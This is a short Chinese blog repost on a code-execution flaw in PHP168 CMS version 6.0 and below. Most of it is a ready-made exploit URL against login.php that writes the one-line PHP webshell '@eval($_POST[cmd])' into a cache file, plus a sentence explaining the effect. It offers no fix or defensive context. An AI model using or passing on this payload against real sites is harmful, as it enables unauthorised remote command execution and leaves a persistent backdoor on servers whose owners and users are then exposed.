码迷,mamicode.com
首页 > Web开发 > 详细

PHP168 6.0及以下版本login.php代码执行

时间:2014-12-18 06:50:08      阅读:176      评论:0      收藏:0      [点我收藏+]

标签:http   os   sp   on   文件   log   bs   代码   html   

在其域名后加上这样一段代码:

login.php?makehtml=1&chdb[htmlname]=xx.php& chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>。

这段代码 的意思利用login.php文件将

<?php%20@eval($_POST[cmd]);?>

这段代码写入到网站缓存目录 cache的xx.php文件中。“<?php%20@eval($_POST[cmd]);?>”就是一句话木马的服务端。

 

 

URL是

http://www.xx.com/login.php?makehtml=1&chdb[htmlname]=xx.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>

PHP168 6.0及以下版本login.php代码执行

标签:http   os   sp   on   文件   log   bs   代码   html   

原文地址:http://www.cnblogs.com/hookjoy/p/4170878.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!